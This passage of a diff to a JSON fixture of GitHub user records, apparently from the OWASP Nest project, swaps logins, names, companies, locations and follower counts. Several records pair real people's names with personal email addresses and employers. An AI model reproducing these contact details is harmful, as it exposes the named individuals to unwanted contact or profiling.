"public_gists_count": 0, - "public_repositories_count": 25, - "created_at": "2015-11-11T19:55:17Z", - "updated_at": "2024-07-09T02:21:40Z", - "node_id": "MDQ6VXNlcjE1ODA1ODAy", + "public_repositories_count": 8, + "created_at": "2023-04-04T06:17:31Z", + "updated_at": "2024-07-30T14:11:48Z", + "node_id": "U_kgDOB70IRQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387478,99 +644577,99 @@ }, { "model": "github.user", - "pk": 1090, + "pk": 6347, "fields": { - "nest_created_at": "2024-09-11T22:45:44.601Z", - "nest_updated_at": "2024-09-12T01:28:18.724Z", - "name": "Varun Kakumani", - "login": "kakumanivrn", - "email": "kakumanivrn@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/4201693?v=4", + "nest_created_at": "2024-09-22T07:41:43.244Z", + "nest_updated_at": "2024-09-22T18:44:16.550Z", + "name": "", + "login": "rwanauo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38076067?v=4", "company": "", - "location": "London", + "location": "", "collaborators_count": 0, - "following_count": 19, - "followers_count": 33, - "public_gists_count": 3, - "public_repositories_count": 29, - "created_at": "2013-04-19T13:15:30Z", - "updated_at": "2024-06-23T18:16:44Z", - "node_id": "MDQ6VXNlcjQyMDE2OTM=", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-04-04T14:01:26Z", + "updated_at": "2022-12-15T11:44:28Z", + "node_id": "MDQ6VXNlcjM4MDc2MDY3", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1091, + "pk": 6348, "fields": { - "nest_created_at": "2024-09-11T22:45:50.380Z", - "nest_updated_at": "2024-09-12T01:30:30.148Z", - "name": "Jonathan L", - "login": "jonathangull", + "nest_created_at": "2024-09-22T07:41:43.879Z", + "nest_updated_at": "2024-09-22T19:39:05.683Z", + "name": "", + "login": "tree-chtsec", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38224533?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/68040445?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2018-04-09T17:46:52Z", - "updated_at": "2024-08-23T01:55:59Z", - "node_id": "MDQ6VXNlcjM4MjI0NTMz", - "bio": "geek", + "following_count": 9, + "followers_count": 17, + "public_gists_count": 2, + "public_repositories_count": 24, + "created_at": "2020-07-09T01:57:26Z", + "updated_at": "2024-09-18T15:26:47Z", + "node_id": "MDQ6VXNlcjY4MDQwNDQ1", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1092, + "pk": 6349, "fields": { - "nest_created_at": "2024-09-11T22:45:54.516Z", - "nest_updated_at": "2024-09-11T23:12:00.324Z", - "name": "Caroline Russell", - "login": "cerrussell", - "email": "caroline@appthreat.dev", - "avatar_url": "https://avatars.githubusercontent.com/u/80227828?v=4", - "company": "@AppThreat ", - "location": "Durham, North Carolina, US", + "nest_created_at": "2024-09-22T07:41:44.200Z", + "nest_updated_at": "2024-09-22T18:44:17.487Z", + "name": "", + "login": "wr-rmcnamara", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/120456018?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 18, - "followers_count": 20, - "public_gists_count": 9, - "public_repositories_count": 16, - "created_at": "2021-03-07T23:35:29Z", - "updated_at": "2024-08-27T12:34:00Z", - "node_id": "MDQ6VXNlcjgwMjI3ODI4", - "bio": "Staff Security Engineer @AppThreat ", - "is_hireable": true, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-12-13T09:12:31Z", + "updated_at": "2023-04-19T10:25:36Z", + "node_id": "U_kgDOBy4DUg", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1093, + "pk": 6350, "fields": { - "nest_created_at": "2024-09-11T22:45:55.323Z", - "nest_updated_at": "2024-09-11T22:45:55.323Z", - "name": "hejun01", - "login": "jackhj000", - "email": "hejun01@baidu.com", - "avatar_url": "https://avatars.githubusercontent.com/u/30014863?v=4", - "company": "baidu", + "nest_created_at": "2024-09-22T07:41:44.505Z", + "nest_updated_at": "2024-09-22T18:44:17.802Z", + "name": "Ange Tresca", + "login": "angetresca", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42329268?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2017-07-09T05:09:56Z", - "updated_at": "2024-05-27T12:26:41Z", - "node_id": "MDQ6VXNlcjMwMDE0ODYz", + "public_repositories_count": 10, + "created_at": "2018-08-13T01:52:16Z", + "updated_at": "2024-09-18T21:20:46Z", + "node_id": "MDQ6VXNlcjQyMzI5MjY4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387578,49 +644677,49 @@ }, { "model": "github.user", - "pk": 1094, + "pk": 6351, "fields": { - "nest_created_at": "2024-09-11T22:46:04.546Z", - "nest_updated_at": "2024-09-11T22:46:04.546Z", - "name": "Daniil Morozov", - "login": "0x123456789", + "nest_created_at": "2024-09-22T07:41:44.822Z", + "nest_updated_at": "2024-09-22T18:44:18.122Z", + "name": "Anson Allard", + "login": "ansonallard", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36066426?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/34141612?v=4", "company": "", - "location": "Saint Petersburg", + "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 3, - "public_gists_count": 1, - "public_repositories_count": 10, - "created_at": "2018-02-02T07:24:09Z", - "updated_at": "2023-10-16T18:53:14Z", - "node_id": "MDQ6VXNlcjM2MDY2NDI2", - "bio": "Security Researcher, Developer", - "is_hireable": true, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2017-11-30T20:19:05Z", + "updated_at": "2024-02-01T15:51:04Z", + "node_id": "MDQ6VXNlcjM0MTQxNjEy", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1095, + "pk": 6352, "fields": { - "nest_created_at": "2024-09-11T22:46:15.335Z", - "nest_updated_at": "2024-09-11T23:08:42.196Z", - "name": "", - "login": "johennin", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52281498?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:41:45.140Z", + "nest_updated_at": "2024-09-22T18:44:18.456Z", + "name": "Anthony Weems", + "login": "amlweems", + "email": "amlweems@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/117625?v=4", + "company": "Google", + "location": "Michigan", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-06-27T10:49:27Z", - "updated_at": "2024-09-01T11:59:06Z", - "node_id": "MDQ6VXNlcjUyMjgxNDk4", + "following_count": 17, + "followers_count": 274, + "public_gists_count": 7, + "public_repositories_count": 87, + "created_at": "2009-08-20T18:43:45Z", + "updated_at": "2024-09-08T00:14:59Z", + "node_id": "MDQ6VXNlcjExNzYyNQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387628,24 +644727,24 @@ }, { "model": "github.user", - "pk": 1096, + "pk": 6353, "fields": { - "nest_created_at": "2024-09-11T22:46:16.649Z", - "nest_updated_at": "2024-09-12T00:34:38.872Z", - "name": "", - "login": "almaz045", + "nest_created_at": "2024-09-22T07:41:45.457Z", + "nest_updated_at": "2024-09-22T18:44:18.772Z", + "name": "BaseCrusher", + "login": "BaseCrusher", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/63047433?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/12885003?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2020-04-02T10:23:54Z", - "updated_at": "2024-09-02T12:07:24Z", - "node_id": "MDQ6VXNlcjYzMDQ3NDMz", + "public_repositories_count": 4, + "created_at": "2015-06-14T18:18:30Z", + "updated_at": "2024-08-23T06:55:11Z", + "node_id": "MDQ6VXNlcjEyODg1MDAz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387653,24 +644752,24 @@ }, { "model": "github.user", - "pk": 1097, + "pk": 6354, "fields": { - "nest_created_at": "2024-09-11T22:46:20.335Z", - "nest_updated_at": "2024-09-11T22:46:20.335Z", - "name": "Steve Pritchard", - "login": "sjpritchard", + "nest_created_at": "2024-09-22T07:41:45.784Z", + "nest_updated_at": "2024-09-22T18:44:19.094Z", + "name": "Bob Brumfield", + "login": "brumfb", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1045715?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1197985?v=4", "company": "", - "location": "", + "location": "Bellevue, WA", "collaborators_count": 0, - "following_count": 10, - "followers_count": 5, - "public_gists_count": 1, - "public_repositories_count": 17, - "created_at": "2011-09-12T21:37:02Z", - "updated_at": "2024-09-03T11:11:25Z", - "node_id": "MDQ6VXNlcjEwNDU3MTU=", + "following_count": 2, + "followers_count": 9, + "public_gists_count": 3, + "public_repositories_count": 27, + "created_at": "2011-11-15T23:11:58Z", + "updated_at": "2024-08-29T17:07:06Z", + "node_id": "MDQ6VXNlcjExOTc5ODU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387678,24 +644777,24 @@ }, { "model": "github.user", - "pk": 1098, + "pk": 6355, "fields": { - "nest_created_at": "2024-09-11T22:46:23.183Z", - "nest_updated_at": "2024-09-11T22:46:23.183Z", - "name": "", - "login": "zhcoden", + "nest_created_at": "2024-09-22T07:41:46.130Z", + "nest_updated_at": "2024-09-22T18:44:19.411Z", + "name": "Cory Fitzpatrick", + "login": "fitzmx6", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/140381970?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6617244?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-07-24T07:47:01Z", - "updated_at": "2024-05-19T11:44:21Z", - "node_id": "U_kgDOCF4PEg", + "public_repositories_count": 7, + "created_at": "2014-02-07T16:08:29Z", + "updated_at": "2024-07-18T14:43:22Z", + "node_id": "MDQ6VXNlcjY2MTcyNDQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387703,14 +644802,14 @@ }, { "model": "github.user", - "pk": 1099, + "pk": 6356, "fields": { - "nest_created_at": "2024-09-11T22:46:25.249Z", - "nest_updated_at": "2024-09-11T22:46:25.249Z", + "nest_created_at": "2024-09-22T07:41:46.438Z", + "nest_updated_at": "2024-09-22T18:44:19.721Z", "name": "", - "login": "lm-sig", + "login": "pinkcr", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/54909895?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/67261588?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -387718,9 +644817,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 2, - "created_at": "2019-09-04T18:15:01Z", - "updated_at": "2023-12-04T13:46:22Z", - "node_id": "MDQ6VXNlcjU0OTA5ODk1", + "created_at": "2020-06-22T08:11:28Z", + "updated_at": "2021-07-07T14:01:52Z", + "node_id": "MDQ6VXNlcjY3MjYxNTg4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387728,99 +644827,99 @@ }, { "model": "github.user", - "pk": 1100, + "pk": 6357, "fields": { - "nest_created_at": "2024-09-11T22:46:29.045Z", - "nest_updated_at": "2024-09-11T22:46:29.045Z", - "name": "Kaio Rafael (kaiux)", - "login": "kaiorafael", + "nest_created_at": "2024-09-22T07:41:46.754Z", + "nest_updated_at": "2024-09-22T18:44:20.029Z", + "name": "Guilherme C. Matuella", + "login": "matuella", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3171389?v=4", - "company": "@aws", + "avatar_url": "https://avatars.githubusercontent.com/u/13678134?v=4", + "company": "Blank Street", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2013-01-02T18:45:46Z", - "updated_at": "2024-07-24T13:20:05Z", - "node_id": "MDQ6VXNlcjMxNzEzODk=", - "bio": "I am Security Researcher", - "is_hireable": true, + "following_count": 30, + "followers_count": 88, + "public_gists_count": 7, + "public_repositories_count": 27, + "created_at": "2015-08-06T12:20:07Z", + "updated_at": "2024-09-18T11:38:08Z", + "node_id": "MDQ6VXNlcjEzNjc4MTM0", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1101, + "pk": 6358, "fields": { - "nest_created_at": "2024-09-11T22:46:30.271Z", - "nest_updated_at": "2024-09-12T01:39:46.030Z", - "name": "Andrew Pollock", - "login": "andrewpollock", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6906046?v=4", - "company": "Google Open Source Security Team", - "location": "Brisbane", + "nest_created_at": "2024-09-22T07:41:47.065Z", + "nest_updated_at": "2024-09-22T18:44:20.336Z", + "name": "Gustav Bylund", + "login": "xkabylgSICKAG", + "email": "gustav.bylund@sick.se", + "avatar_url": "https://avatars.githubusercontent.com/u/158184350?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 12, - "followers_count": 141, - "public_gists_count": 3, - "public_repositories_count": 27, - "created_at": "2014-03-10T10:41:58Z", - "updated_at": "2024-09-08T23:39:24Z", - "node_id": "MDQ6VXNlcjY5MDYwNDY=", - "bio": "I'm a software engineer at Google, working on OSV.dev, which ties into open source vulnerability management and related software supply chain security.", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2024-01-30T15:08:25Z", + "updated_at": "2024-09-20T08:04:01Z", + "node_id": "U_kgDOCW2zng", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1102, + "pk": 6359, "fields": { - "nest_created_at": "2024-09-11T22:46:31.524Z", - "nest_updated_at": "2024-09-11T22:46:31.524Z", - "name": "Yunus AYDIN", - "login": "aydinnyunus", - "email": "aydinnyunus@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/52822869?v=4", + "nest_created_at": "2024-09-22T07:41:47.732Z", + "nest_updated_at": "2024-09-22T18:44:20.961Z", + "name": "Jean-Eric Cuendet (Perso)", + "login": "jecuendet", + "email": "jec@jesc.ch", + "avatar_url": "https://avatars.githubusercontent.com/u/3475116?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 75, - "followers_count": 910, - "public_gists_count": 6, - "public_repositories_count": 78, - "created_at": "2019-07-12T10:50:49Z", - "updated_at": "2024-09-02T20:02:09Z", - "node_id": "MDQ6VXNlcjUyODIyODY5", + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2013-02-04T20:12:49Z", + "updated_at": "2024-07-23T16:55:33Z", + "node_id": "MDQ6VXNlcjM0NzUxMTY=", "bio": "", - "is_hireable": true, - "twitter_username": "aydinnyunuss" + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1103, + "pk": 6360, "fields": { - "nest_created_at": "2024-09-11T22:46:32.851Z", - "nest_updated_at": "2024-09-11T22:46:32.851Z", - "name": "Nadir", - "login": "Nadir-CS", + "nest_created_at": "2024-09-22T07:41:48.067Z", + "nest_updated_at": "2024-09-22T18:47:13.821Z", + "name": "Jonas Arnold Clasen", + "login": "jonasac", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/88508418?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1088181?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-08-05T18:19:40Z", - "updated_at": "2023-03-02T19:06:51Z", - "node_id": "MDQ6VXNlcjg4NTA4NDE4", + "following_count": 14, + "followers_count": 11, + "public_gists_count": 2, + "public_repositories_count": 18, + "created_at": "2011-09-28T21:39:06Z", + "updated_at": "2024-06-02T14:11:55Z", + "node_id": "MDQ6VXNlcjEwODgxODE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387828,24 +644927,24 @@ }, { "model": "github.user", - "pk": 1104, + "pk": 6361, "fields": { - "nest_created_at": "2024-09-11T22:46:34.091Z", - "nest_updated_at": "2024-09-13T17:09:36.696Z", - "name": "Manuel Nader", - "login": "manuel-cohere", + "nest_created_at": "2024-09-22T07:41:48.379Z", + "nest_updated_at": "2024-09-22T18:44:21.593Z", + "name": "Juha Reunanen", + "login": "reunanen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/167128611?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2297572?v=4", + "company": "Tomaattinen", + "location": "Helsinki", "collaborators_count": 0, - "following_count": 3, - "followers_count": 0, + "following_count": 12, + "followers_count": 41, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-04-15T18:38:14Z", - "updated_at": "2024-06-03T17:30:49Z", - "node_id": "U_kgDOCfYuIw", + "public_repositories_count": 110, + "created_at": "2012-09-07T07:50:56Z", + "updated_at": "2024-09-17T01:53:13Z", + "node_id": "MDQ6VXNlcjIyOTc1NzI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -387853,224 +644952,224 @@ }, { "model": "github.user", - "pk": 1105, + "pk": 6362, "fields": { - "nest_created_at": "2024-09-11T22:46:58.692Z", - "nest_updated_at": "2024-09-11T22:54:44.076Z", - "name": "Florian Heubeck", - "login": "heubeck", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40993644?v=4", - "company": "@MediaMarktSaturn ", - "location": "Ingolstadt, Bavaria, Germany", + "nest_created_at": "2024-09-22T07:41:48.702Z", + "nest_updated_at": "2024-09-22T18:44:21.906Z", + "name": "Khub", + "login": "Khubajsn", + "email": "khubajsn@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/297170?v=4", + "company": "", + "location": "Czech Republic", "collaborators_count": 0, - "following_count": 11, - "followers_count": 46, - "public_gists_count": 1, - "public_repositories_count": 41, - "created_at": "2018-07-09T09:17:48Z", - "updated_at": "2024-09-11T10:14:15Z", - "node_id": "MDQ6VXNlcjQwOTkzNjQ0", - "bio": "Principal Engineer @MediaMarktSaturn Technology • Organizer @jug-in • Cloud & GitOps Fanatic @DOAGeV / @dcnc-eu", + "following_count": 0, + "followers_count": 5, + "public_gists_count": 10, + "public_repositories_count": 5, + "created_at": "2010-06-05T06:03:45Z", + "updated_at": "2024-07-24T20:17:28Z", + "node_id": "MDQ6VXNlcjI5NzE3MA==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1106, + "pk": 6363, "fields": { - "nest_created_at": "2024-09-11T22:48:20.789Z", - "nest_updated_at": "2024-09-18T18:53:01.829Z", - "name": "Martin Nocker", - "login": "MartinNoc", + "nest_created_at": "2024-09-22T07:41:49.339Z", + "nest_updated_at": "2024-09-22T18:44:22.542Z", + "name": "Konstantin Ruzavin", + "login": "avgkoster", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10062471?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36166921?v=4", + "company": "MANGO Development", "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 4, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2014-12-03T14:49:31Z", - "updated_at": "2024-06-27T06:27:13Z", - "node_id": "MDQ6VXNlcjEwMDYyNDcx", - "bio": "", + "public_repositories_count": 4, + "created_at": "2018-02-05T17:02:19Z", + "updated_at": "2024-09-13T19:53:42Z", + "node_id": "MDQ6VXNlcjM2MTY2OTIx", + "bio": "DevSecOps Engineer", "is_hireable": false, - "twitter_username": "nockermartin" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1107, + "pk": 6364, "fields": { - "nest_created_at": "2024-09-11T22:48:28.720Z", - "nest_updated_at": "2024-09-18T18:53:10.009Z", - "name": "Nikolai Khechumov", - "login": "ntoskernel", + "nest_created_at": "2024-09-22T07:41:49.963Z", + "nest_updated_at": "2024-09-22T18:44:23.173Z", + "name": "Marco Ippolito", + "login": "marco-ippolito", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11661706?v=4", - "company": "@Yandex", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36735501?v=4", + "company": "@herodevs", + "location": "Milan", "collaborators_count": 0, - "following_count": 7, - "followers_count": 11, + "following_count": 20, + "followers_count": 226, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2015-03-26T09:22:18Z", - "updated_at": "2024-09-14T14:17:41Z", - "node_id": "MDQ6VXNlcjExNjYxNzA2", - "bio": "Security Engineer", + "public_repositories_count": 40, + "created_at": "2018-02-22T14:06:43Z", + "updated_at": "2024-09-15T21:04:51Z", + "node_id": "MDQ6VXNlcjM2NzM1NTAx", + "bio": "@nodejs TSC", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1108, + "pk": 6365, "fields": { - "nest_created_at": "2024-09-11T22:48:35.708Z", - "nest_updated_at": "2024-09-18T18:53:11.438Z", - "name": "Abhijit Chatterjee", - "login": "abhijitio", + "nest_created_at": "2024-09-22T07:41:50.579Z", + "nest_updated_at": "2024-09-22T18:44:23.797Z", + "name": "Michael", + "login": "misl-smlz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19294879?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/129034281?v=4", "company": "", - "location": "Bangalore", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2016-05-10T22:04:08Z", - "updated_at": "2024-08-07T20:22:06Z", - "node_id": "MDQ6VXNlcjE5Mjk0ODc5", - "bio": "Kubernetespedia", - "is_hireable": true, + "public_repositories_count": 8, + "created_at": "2023-03-27T05:54:11Z", + "updated_at": "2024-09-13T09:59:25Z", + "node_id": "U_kgDOB7DoKQ", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1109, + "pk": 6366, "fields": { - "nest_created_at": "2024-09-11T22:48:47.366Z", - "nest_updated_at": "2024-09-18T18:53:21.939Z", - "name": "OWASP Four Clover", - "login": "fourcloverorg", - "email": "contact@fourclover.org", - "avatar_url": "https://avatars.githubusercontent.com/u/132184099?v=4", - "company": "", + "nest_created_at": "2024-09-22T07:41:50.889Z", + "nest_updated_at": "2024-09-22T18:44:24.106Z", + "name": "Miso Lith", + "login": "mwing", + "email": "miso.k.lith@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/96297?v=4", + "company": "@s-group-dev ", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-04-30T04:31:20Z", - "updated_at": "2024-09-15T12:52:55Z", - "node_id": "O_kgDOB-D4Iw", + "followers_count": 13, + "public_gists_count": 1, + "public_repositories_count": 21, + "created_at": "2009-06-17T11:01:36Z", + "updated_at": "2024-08-02T06:10:14Z", + "node_id": "MDQ6VXNlcjk2Mjk3", "bio": "", "is_hireable": false, - "twitter_username": "fourcloverorg" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1110, + "pk": 6367, "fields": { - "nest_created_at": "2024-09-11T22:48:50.799Z", - "nest_updated_at": "2024-09-11T22:48:50.799Z", - "name": "Vaishno Chaitanya", - "login": "vchan-in", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17123227?v=4", - "company": "", - "location": "India", + "nest_created_at": "2024-09-22T07:41:51.201Z", + "nest_updated_at": "2024-09-22T18:44:24.410Z", + "name": "Muhammet Ilendemli", + "login": "ilendemli", + "email": "ilendemli@live.at", + "avatar_url": "https://avatars.githubusercontent.com/u/2271750?v=4", + "company": "ÖBB", + "location": "Lower-Austria", "collaborators_count": 0, - "following_count": 11, - "followers_count": 37, - "public_gists_count": 3, - "public_repositories_count": 41, - "created_at": "2016-02-08T12:57:33Z", - "updated_at": "2024-09-06T05:24:04Z", - "node_id": "MDQ6VXNlcjE3MTIzMjI3", - "bio": "Techie | Hacker.", + "following_count": 14, + "followers_count": 32, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2012-09-03T15:29:05Z", + "updated_at": "2024-09-18T16:46:25Z", + "node_id": "MDQ6VXNlcjIyNzE3NTA=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1111, + "pk": 6368, "fields": { - "nest_created_at": "2024-09-11T22:48:56.418Z", - "nest_updated_at": "2024-09-18T18:53:44.387Z", - "name": "Cervantes", - "login": "CervantesSec", + "nest_created_at": "2024-09-22T07:41:51.827Z", + "nest_updated_at": "2024-09-22T18:44:25.023Z", + "name": "Preetam", + "login": "Preetam", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/104642981?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/379404?v=4", "company": "", - "location": "Spain", + "location": "United States", "collaborators_count": 0, "following_count": 0, - "followers_count": 46, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2022-04-29T16:04:19Z", - "updated_at": "2024-02-04T15:30:24Z", - "node_id": "O_kgDOBjy5pQ", - "bio": "Cervantes is an opensource collaborative paltform for pentesters or red teams", + "followers_count": 147, + "public_gists_count": 57, + "public_repositories_count": 159, + "created_at": "2010-08-29T00:46:59Z", + "updated_at": "2024-08-26T14:10:37Z", + "node_id": "MDQ6VXNlcjM3OTQwNA==", + "bio": "", "is_hireable": false, - "twitter_username": "Cervantes_Sec" + "twitter_username": "preetamjinka" } }, { "model": "github.user", - "pk": 1112, + "pk": 6369, "fields": { - "nest_created_at": "2024-09-11T22:49:03.388Z", - "nest_updated_at": "2024-09-11T22:49:06.716Z", - "name": "Alexandre ZANNI", - "login": "noraj", + "nest_created_at": "2024-09-22T07:41:52.137Z", + "nest_updated_at": "2024-09-22T18:44:25.332Z", + "name": "Roman Sichnyi", + "login": "rsichnyi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16578570?v=4", - "company": "Rawsec", - "location": "FRANCE", + "avatar_url": "https://avatars.githubusercontent.com/u/745639?v=4", + "company": "GlobalLogic", + "location": "", "collaborators_count": 0, - "following_count": 32, - "followers_count": 1749, - "public_gists_count": 29, - "public_repositories_count": 692, - "created_at": "2016-01-06T15:48:38Z", - "updated_at": "2024-08-24T11:30:53Z", - "node_id": "MDQ6VXNlcjE2NTc4NTcw", - "bio": "I'm a Cybersecurity engineer, security auditor, pentester and ethical hacker.", + "following_count": 0, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 8, + "created_at": "2011-04-22T10:29:52Z", + "updated_at": "2024-09-18T15:57:21Z", + "node_id": "MDQ6VXNlcjc0NTYzOQ==", + "bio": "", "is_hireable": false, - "twitter_username": "noraj_rawsec" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1113, + "pk": 6370, "fields": { - "nest_created_at": "2024-09-11T22:49:03.774Z", - "nest_updated_at": "2024-09-18T18:53:35.584Z", - "name": "Ruben Mesquida", - "login": "mesquidar", + "nest_created_at": "2024-09-22T07:41:52.445Z", + "nest_updated_at": "2024-09-22T18:44:25.649Z", + "name": "Sneha Saxena", + "login": "iamahens", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16049893?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/128135438?v=4", "company": "", - "location": "Spain", + "location": "", "collaborators_count": 0, - "following_count": 23, - "followers_count": 160, + "following_count": 1, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2015-11-27T17:07:51Z", - "updated_at": "2024-08-15T11:03:58Z", - "node_id": "MDQ6VXNlcjE2MDQ5ODkz", + "public_repositories_count": 46, + "created_at": "2023-03-17T09:03:51Z", + "updated_at": "2024-09-19T05:49:58Z", + "node_id": "U_kgDOB6MxDg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -388078,49 +645177,99 @@ }, { "model": "github.user", - "pk": 1114, + "pk": 6371, "fields": { - "nest_created_at": "2024-09-11T22:49:08.368Z", - "nest_updated_at": "2024-09-11T22:49:08.368Z", - "name": "Riccardo Mollo", - "login": "rm1984", + "nest_created_at": "2024-09-22T07:42:12.356Z", + "nest_updated_at": "2024-09-22T18:44:45.236Z", + "name": "Magnus Persson", + "login": "magnusp", + "email": "magnus.e.persson@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1431685?v=4", + "company": "Fortnox", + "location": "Sweden", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 8, + "public_gists_count": 4, + "public_repositories_count": 52, + "created_at": "2012-02-12T21:52:39Z", + "updated_at": "2024-09-12T22:55:32Z", + "node_id": "MDQ6VXNlcjE0MzE2ODU=", + "bio": "Developer, plain and simple.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6372, + "fields": { + "nest_created_at": "2024-09-22T07:42:12.665Z", + "nest_updated_at": "2024-09-22T19:42:20.773Z", + "name": "K3rnelPan1c", + "login": "k3rnelpan1c-dev", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10762991?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/69395733?v=4", "company": "", - "location": "Turin, Italy", + "location": "128.0.0.1, ::1", "collaborators_count": 0, - "following_count": 25, - "followers_count": 19, - "public_gists_count": 3, - "public_repositories_count": 16, - "created_at": 